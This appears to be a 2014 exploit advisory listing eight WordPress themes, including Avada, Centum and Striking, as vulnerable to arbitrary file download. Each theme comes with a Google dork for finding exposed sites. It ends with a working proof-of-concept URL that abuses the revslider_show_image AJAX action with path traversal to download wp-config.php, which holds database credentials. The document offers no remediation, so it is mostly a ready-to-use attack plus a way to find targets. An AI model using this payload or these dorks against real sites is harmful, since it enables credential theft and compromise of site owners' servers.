42 lines
No EOL
1.8 KiB
Text
42 lines
No EOL
1.8 KiB
Text
# WordPress CuckooTap Theme & eShop Arbitrary File Download
|
|
# Risk: High
|
|
# CWE number: CWE-200
|
|
# Author: Hugo Santiago
|
|
# Contact: hugo.s@linuxmail.org
|
|
# Date: 31/08/2014
|
|
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
|
|
# Tested on: Windows 7 and Gnu/Linux
|
|
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
|
|
|
|
# WordPress IncredibleWP Theme Arbitrary File Download
|
|
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
|
|
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
|
|
|
|
# WordPress Ultimatum Theme Arbitrary File Download
|
|
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
|
|
# Google Dork: "Index of" +/wp-content/themes/ultimatum
|
|
|
|
# WordPress Medicate Theme Arbitrary File Download
|
|
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
|
|
# Google Dork: "Index of" +/wp-content/themes/medicate/
|
|
|
|
# WordPress Centum Theme Arbitrary File Download
|
|
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
|
|
# Google Dork: "Index of" +/wp-content/themes/Centum/
|
|
|
|
# WordPress Avada Theme Arbitrary File Download
|
|
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
|
|
# Google Dork: "Index of" +/wp-content/themes/Avada/
|
|
|
|
# WordPress Striking Theme & E-Commerce Arbitrary File Download
|
|
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
|
|
# Google Dork: "Index of" +/wp-content/themes/striking_r/
|
|
|
|
# WordPress Beach Apollo Arbitrary File Download
|
|
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
|
|
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/
|
|
|
|
|
|
PoC:
|
|
|
|
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php |